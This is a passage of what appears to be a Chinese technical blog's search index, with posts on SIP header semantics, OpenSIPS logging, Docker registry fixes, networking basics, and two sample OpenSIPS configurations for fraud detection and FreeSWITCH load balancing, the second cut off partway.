When a pre-existing route set is present, the procedures for populating the Request-URI and Route header field detailed in Section 12.2.1.1 MUST be followed (even though there is no dialog), using the desired Request-URI as the remote target URI.\n","permalink":"https://wdd.js.org/opensips/ch1/from-to-request-url/","summary":"from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 一般情况下,sip消息在传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;.","title":"from vs to vs request-url之间的关系"},{"content":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志级别调整到-1\n1.x的opensips使用 
debug=3 设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","title":"日志xlog"},{"content":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","permalink":"https://wdd.js.org/posts/2019/07/pxdvcx/","summary":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","title":"编码规则"},{"content":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了的说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的链接,所以路由器一般至少会链接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 一个Web服务器的工作过程s step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接受完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","permalink":"https://wdd.js.org/network/graph-network/","summary":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了的说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的链接,所以路由器一般至少会链接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 
一个Web服务器的工作过程s step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接受完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","title":"图解通信网络 第二版"},{"content":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","permalink":"https://wdd.js.org/posts/2019/07/fpbkzg/","summary":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","title":"Docker相关问题及解决方案"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the 
\u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME listen=udp:10.0.2.8:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; 
modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;fraud_detection.so\u0026#34; modparam(\u0026#34;fraud_detection\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;cachedb_local.so\u0026#34; #loadmodule \u0026#34;aaa_radius.so\u0026#34; #modparam(\u0026#34;aaa_radius\u0026#34;,\u0026#34;radius_config\u0026#34;,\u0026#34;modules/acc/etc/radius/radiusclient.conf\u0026#34;) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ #modparam(\u0026#34;acc\u0026#34;, \u0026#34;aaa_url\u0026#34;, \u0026#34;radius:modules/acc/etc/radius/radiusclient.conf\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. 
if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_bye_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) /* account triggers (flags) */ loadmodule \u0026#34;avpops.so\u0026#34; modparam(\u0026#34;avpops\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;1 mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; modparam(\u0026#34;db_mysql\u0026#34;, \u0026#34;exec_query_threshold\u0026#34;, 500000) loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;rest_client.so\u0026#34; loadmodule \u0026#34;dispatcher.so\u0026#34; modparam(\u0026#34;dispatcher\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) ####### Routing Logic ######## # main request routing logic route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 
404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (from_uri==myself) { } else { # if caller is not local, then called number must be local } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed|failed\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!check_fraud(\u0026#34;$fU\u0026#34;, \u0026#34;$rU\u0026#34;, \u0026#34;2\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; } $du = \u0026#34;sip:10.0.2.8:7050\u0026#34;; route(relay); } route [relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); 
t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } route [ds_route] { xlog(\u0026#34;foo\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } event_route [E_FRD_WARNING] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_WARNING: $var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_cpm++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_cdur++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_tc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_cc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_seq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, 1, 0); } } event_route [E_FRD_CRITICAL] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_CRITICAL: 
$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_critcpm++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_critcdur++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_crittc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_critcc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_critseq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, 1, 0); } } route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, \u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_fraud_cpm, 1] { $var(cpm) = 0; $var(ccpm) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, $var(cpm)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, $var(ccpm)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cpm)); route(store_influxdb, 
\u0026#34;fraud_demo\u0026#34;, \u0026#34;critcpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccpm)); xlog(\u0026#34;XXX stats: $var(cpm) / $var(ccpm)\\n\u0026#34;); } timer_route [dump_fraud_cdur, 1] { $var(cdur) = 0; $var(ccdur) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, $var(cdur)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, $var(ccdur)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cdur)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccdur)); xlog(\u0026#34;XXX stats: $var(cdur) / $var(ccdur)\\n\u0026#34;); } timer_route [dump_fraud_tc, 1] { $var(tc) = 0; $var(ctc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, $var(tc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, $var(ctc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;tc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(tc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;crittc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ctc)); xlog(\u0026#34;XXX stats: $var(tc) / $var(ctc)\\n\u0026#34;); } timer_route [dump_fraud_cc, 1] { $var(cc) = 0; $var(ccc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, $var(cc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, $var(ccc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;); route(store_influxdb, 
\u0026#34;fraud_demo\u0026#34;, \u0026#34;cc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccc)); xlog(\u0026#34;XXX stats: $var(cc) / $var(ccc)\\n\u0026#34;); } timer_route [dump_fraud_seq, 1] { $var(seq) = 0; $var(cseq) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, $var(seq)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, $var(cseq)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;seq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(seq)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critseq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cseq)); xlog(\u0026#34;XXX stats: $var(seq) / $var(cseq)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fraud/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for an explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:127.","title":"opensips-summit-fraud"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for an explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:192.168.56.1:5070 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8081) loadmodule \u0026#34;mi_json.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 2) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;mathops.so\u0026#34; modparam(\u0026#34;mathops\u0026#34;, \u0026#34;decimal_digits\u0026#34;, 12) loadmodule \u0026#34;rest_client.so\u0026#34; #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, 
\u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo_2\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) loadmodule \u0026#34;cfgutils.so\u0026#34; #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direction of the sequential requests. 
if you enable this parameter, be sure to enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;statistics.so\u0026#34; loadmodule \u0026#34;load_balancer.so\u0026#34; modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@192.168.56.128/opensips\u0026#34;) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;initial_freeswitch_load\u0026#34;, 15) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;fetch_freeswitch_stats\u0026#34;, 1) loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; ####### Routing Logic ######## # main request routing logic startup_route { $stat(neg_replies) = 0; } route { if ($stat(neg_replies) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) $stat(neg_replies) = 0; if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential requests within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). 
